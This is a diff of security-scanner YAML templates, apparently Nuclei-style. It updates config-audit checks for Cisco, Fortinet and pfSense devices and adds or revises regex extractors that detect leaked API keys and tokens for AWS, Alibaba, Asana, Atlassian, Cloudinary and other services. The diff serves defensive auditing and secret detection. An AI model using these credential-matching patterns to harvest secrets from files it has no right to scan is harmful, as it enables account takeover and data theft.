tags: cisco,config-audit,cisco-switch,file tags: cisco,config-audit,cisco-switch,file
file: file:
@ -24,3 +28,5 @@ file:
- type: word - type: word
words: words:
- "configure terminal" - "configure terminal"
# Enhanced by md on 2023/05/03

View File

@ -1,13 +1,17 @@
id: set-and-secure-passwords id: set-and-secure-passwords
info: info:
name: Set and secure passwords name: Cisco Set and Secure Password - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command. Cisco set and secure password functionality is recommended to control privilege level access. To set a local password to control access to various privilege levels, use the enable password command in global configuration mode. To remove the password requirement, use the no form of this command.
reference: reference:
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514 - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-e1.html#wp3884449514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file tags: cisco,config-audit,cisco-switch,file
file: file:
@ -24,3 +28,5 @@ file:
- type: word - type: word
words: words:
- "configure terminal" - "configure terminal"
# Enhanced by md on 2023/05/03

View File

@ -1,11 +1,15 @@
id: auto-usb-install id: auto-usb-install
info: info:
name: Auto USB Installation Enabled name: Fortinet Auto USB Installation Enabled - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port. description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:
@ -26,3 +30,5 @@ file:
- "config router" - "config router"
- "config firewall" - "config firewall"
condition: or condition: or
# Enhanced by md on 2023/05/03

View File

@ -1,11 +1,16 @@
id: heuristic-scan id: heuristic-scan
info: info:
name: Heuristic scanning is not configured name: Fortinet Heuristic Scanning not Configured - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled. description: |
Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:
@ -26,3 +31,5 @@ file:
- "config router" - "config router"
- "config firewall" - "config firewall"
condition: or condition: or
# Enhanced by md on 2023/05/03

View File

@ -1,11 +1,15 @@
id: inactivity-timeout id: inactivity-timeout
info: info:
name: Inactivity Timeout Not Implemented name: Fortinet Inactivity Timeout Not Implemented - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. description: If Fortinet inactivity timeout functionality is disabled, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations within that window if the administrator is away from the computer.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:
@ -25,3 +29,5 @@ file:
- "config router" - "config router"
- "config firewall" - "config firewall"
condition: or condition: or
# Enhanced by md on 2023/05/03

View File

@ -1,11 +1,15 @@
id: maintainer-account id: maintainer-account
info: info:
name: Maintainer Account Not Implemented name: Fortinet Maintainer Account Not Implemented - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI.. description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:

View File

@ -1,11 +1,15 @@
id: password-policy id: password-policy
info: info:
name: Password Policy not Set name: Fortinet Password Policy Not Set - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements. description: Fortinet administrative password policy is not set. Using this feature is recommended to ensure all administrators use secure passwords that meet organizations' requirements.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: fortigate,config,audit,file,firewall tags: fortigate,config,audit,file,firewall
file: file:

View File

@ -1,11 +1,16 @@
id: remote-auth-timeout id: remote-auth-timeout
info: info:
name: Remote Authentication timeout not set name: Fortinet Remote Authentication Timeout Not Set - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer. description: Fortinet remote authentication timeout functionality is recommended to be enabled. Lack of a set timeout can allow an attacker to act within that threshold if the administrator is away from the computer, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate reference:
- https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:

View File

@ -1,11 +1,15 @@
id: scp-admin id: scp-admin
info: info:
name: Admin-SCP Disabled name: Fortinet Admin-SCP Disabled - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file. description: Fortinet Admin-SCP functionality is recommended to be disabled by default. Enabling SCP allows download of the configuration file from the FortiGate as an alternative method of backing up the configuration file.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,fortigate tags: audit,config,file,firewall,fortigate
file: file:

View File

@ -1,13 +1,17 @@
id: configure-dns-server id: configure-dns-server
info: info:
name: Configure DNS Server name: DNS Server Not Implemented - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
The purpose DNs server is to perform the resolution of system hostnames to Internet Protocol (IP) addresses. DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers.
reference: | reference: |
https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html https://docs.netgate.com/pfsense/en/latest/recipes/dns-over-tls.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: firewall,config,audit,pfsense,file tags: firewall,config,audit,pfsense,file
@ -28,3 +32,5 @@ file:
- "<pfsense>" - "<pfsense>"
- "<system>" - "<system>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,13 +1,17 @@
id: configure-session-timeout id: configure-session-timeout
info: info:
name: Configure Sessions Timeout name: PfSence Configure Sessions Timeout Not Set - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Indefinite or even long session timeout window increase the risk of attackers abusing abandoned sessions. Configure sessions timeout is recommended to be enabled. An indefinite or even long session timeout window can increase the risk of an attacker abusing abandoned sessions and potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference: | reference: |
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: firewall,config,audit,pfsense,file tags: firewall,config,audit,pfsense,file
@ -31,3 +35,5 @@ file:
- "<webgui>" - "<webgui>"
- "<system>" - "<system>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,14 +1,17 @@
id: enable-https-protocol id: enable-https-protocol
info: info:
name: Enable HTTPS on Web Management name: Pfsence Web Admin Management Portal HTTPS Not Set - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Web Admin Management Portal should only be accessed using HTTPS Protocol.HTTP transmits all data (including passwords) in clear text over the network and PfSence Web Admin Management Portal is recommended to be accessible using only HTTPS protocol. HTTP transmits all data, including passwords, in clear text over the network and provides no assurance of the identity of the hosts involved, making it possible for an attacker to obtain sensitive information, modify data, and/or execute unauthorized operations.
provides no assurance of the identity of the hosts involved.
reference: | reference: |
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: firewall,config,audit,pfsense,file tags: firewall,config,audit,pfsense,file
@ -31,3 +34,5 @@ file:
- "<pfsense>" - "<pfsense>"
- "<system>" - "<system>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,16 +1,17 @@
id: known-default-account id: known-default-account
info: info:
name: Known Default Account - Detect name: PfSence Known Default Account - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
In order to attempt access to known devices' platforms, attackers use the available database of the known default accounts for each platform or Operating System. PfSence configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'.
The known default accounts are often (without limiting to) the following: 'admin'.
reference: | reference: |
- https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
remediation: | classification:
Deletes the known default accounts configured. cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: audit,config,file,firewall,pfsense tags: audit,config,file,firewall,pfsense
file: file:
@ -25,3 +26,5 @@ file:
- "<descr><![CDATA[System Administrator]]></descr>" - "<descr><![CDATA[System Administrator]]></descr>"
- "<priv>user-shell-access</priv>" - "<priv>user-shell-access</priv>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,13 +1,17 @@
id: password-protected-consolemenu id: password-protected-consolemenu
info: info:
name: Configure Password Protected on Console Menu name: PfSence Consolemenu Password Protection Not Implememnted - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
An unattended computer with an open Console Menu session to the device could allow an unauthorized user access to the firewalls management. PfSence password protection via the Console Menu is recommended to be configured. An unattended computer with an open Console Menu session can allow an unauthorized user access to the firewall management.
reference: | reference: |
https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html https://docs.netgate.com/pfsense/en/latest/config/advanced-admin.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: firewall,config,audit,pfsense,file tags: firewall,config,audit,pfsense,file
@ -31,3 +35,5 @@ file:
- "<webgui>" - "<webgui>"
- "<system>" - "<system>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,14 +1,17 @@
id: set-hostname id: set-hostname
info: info:
name: Ensure Hostname is Set name: PfSence Hostname Not Set - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Ensure Hostname is set is a process that helps to ensure that the computer or device is being identified correctly on a network. PfSence Hostname should be set so that other devices on the network can correctly identify it. The hostname is a unique identifier for the device.
The hostname is a unique identifier for the device, and it is important that it is properly set so that other devices on the network can identify it.
reference: | reference: |
https://docs.netgate.com/pfsense/en/latest/config/general.html https://docs.netgate.com/pfsense/en/latest/config/general.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: firewall,config,audit,pfsense,file tags: firewall,config,audit,pfsense,file
file: file:
@ -23,3 +26,5 @@ file:
- "<hostname></hostname>" - "<hostname></hostname>"
- "domain>" - "domain>"
condition: and condition: and
# Enhanced by md on 2023/05/04

View File

@ -1,11 +1,15 @@
id: electron-version-detect id: electron-version-detect
info: info:
name: Electron Version Detect name: Electron Version - Detect
author: me9187 author: me9187
severity: info severity: info
reference: reference:
- https://www.electronjs.org/blog/chromium-rce-vulnerability/ - https://www.electronjs.org/blog/chromium-rce-vulnerability/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: electron,file tags: electron,file
file: file:

View File

@ -0,0 +1,22 @@
id: adafruit-key
info:
name: Adafruit API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go
metadata:
verified: true
tags: adafruit,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: adobe-client
info:
name: Adobe Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go
metadata:
verified: true
tags: adobe,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: airtable-key
info:
name: Airtable API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go
metadata:
verified: true
tags: airtable,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: algolia-key
info:
name: Algolia API Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go
metadata:
verified: true
tags: algolia,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: alibaba-key-id
info:
name: Alibaba Access Key ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go
metadata:
verified: true
tags: alibaba,access,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: alibaba-secret-id
info:
name: Alibaba Secret Key ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go
metadata:
verified: true
tags: alibaba,secret,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -1,11 +1,16 @@
id: amazon-account-id id: amazon-account-id
info: info:
name: AWS Account ID name: Amazon Web Services Account ID - Detect
author: DhiyaneshDK author: DhiyaneshDK
severity: info severity: info
description: Amazon Web Services Account ID token was detected.
reference: reference:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: aws,amazon,token,file tags: aws,amazon,token,file
@ -19,3 +24,5 @@ file:
part: body part: body
regex: regex:
- '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})'
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: amazon-mws-auth-token-value id: amazon-mws-auth-token-value
info: info:
name: Amazon MWS Auth Token name: Amazon MWS Authentication Token - Detect
author: gaurang author: gaurang
severity: medium severity: medium
description: Amazon MWS authentication token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: token,file,amazon,auth tags: token,file,amazon,auth
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# Enhanced by md on 2023/05/04

View File

@ -1,11 +1,16 @@
id: amazon-session-token id: amazon-session-token
info: info:
name: Amazon Session Token name: Amazon Session Token - Detect
author: DhiyaneshDK author: DhiyaneshDK
severity: info severity: info
description: Amazon session token was detected.
reference: reference:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: aws,amazon,token,file,session tags: aws,amazon,token,file,session
@ -19,3 +24,5 @@ file:
part: body part: body
regex: regex:
- '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]'
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: amazon-sns-token id: amazon-sns-token
info: info:
name: Amazon SNS Token Detect name: Amazon SNS Token - Detect
author: TheBinitGhimire author: TheBinitGhimire
severity: info severity: info
description: Amazon SNS token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: file,token,amazon,aws tags: file,token,amazon,aws
file: file:
@ -15,3 +20,5 @@ file:
name: amazon-sns-topic name: amazon-sns-topic
regex: regex:
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: aws-access-key id: aws-access-key
info: info:
name: AWS Access Key ID name: Amazon Web Services Access Key ID - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Amazon Web Services Access Key ID token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: token,file tags: token,file
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: aws-cognito-pool id: aws-cognito-pool
info: info:
name: AWS Cognito Pool ID name: Amazon Web Services Cognito Pool ID - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Amazon Web Services Cognito Pool ID token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: token,file tags: token,file
file: file:
@ -30,3 +35,5 @@ file:
- "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
- "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
- "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}"
# Enhanced by md on 2023/05/04

View File

@ -0,0 +1,22 @@
id: asana-clientid
info:
name: Asana Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml
metadata:
verified: true
tags: asana,client,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: asana-clientsecret
info:
name: Asana Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml
metadata:
verified: true
tags: asana,client,file,keys,secret
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:asana)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -0,0 +1,22 @@
id: atlassian-api-token
info:
name: Atlassian API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml
metadata:
verified: true
tags: atlassian,file,token,api
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$)

View File

@ -1,11 +1,16 @@
id: branch-key id: branch-key
info: info:
name: Branch.io Live Key name: Branch.io Live Key - Detect
author: 0xh7ml author: 0xh7ml
severity: info severity: info
description: Branch.io live key token was detected.
reference: reference:
- https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: token,file tags: token,file
file: file:
@ -16,3 +21,5 @@ file:
- type: regex - type: regex
regex: regex:
- "key_live_.{32}" - "key_live_.{32}"
# Enhanced by md on 2023/05/04

View File

@ -1,9 +1,14 @@
id: cloudinary-basic-auth id: cloudinary-basic-auth
info: info:
name: Cloudinary Basic Auth name: Cloudinary Basic Authorization - Detect
author: gaurang author: gaurang
severity: high severity: high
description: Cloudinary basic authorization token was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: token,file,cloudinary tags: token,file,cloudinary
file: file:
@ -14,3 +19,5 @@ file:
- type: regex - type: regex
regex: regex:
- "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+"
# Enhanced by md on 2023/05/04

View File

@ -1,12 +1,17 @@
id: code-climate-token id: code-climate-token
info: info:
name: Code Climate Token name: Code Climate Token - Detect
author: DhiyaneshDK author: DhiyaneshDK
severity: info severity: info
description: Code Climate token was detected.
reference: reference:
- https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml
- https://github.com/codeclimate/ruby-test-reporter/issues/34 - https://github.com/codeclimate/ruby-test-reporter/issues/34
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: codeclimate,token,file tags: codeclimate,token,file
@ -20,3 +25,5 @@ file:
part: body part: body
regex: regex:
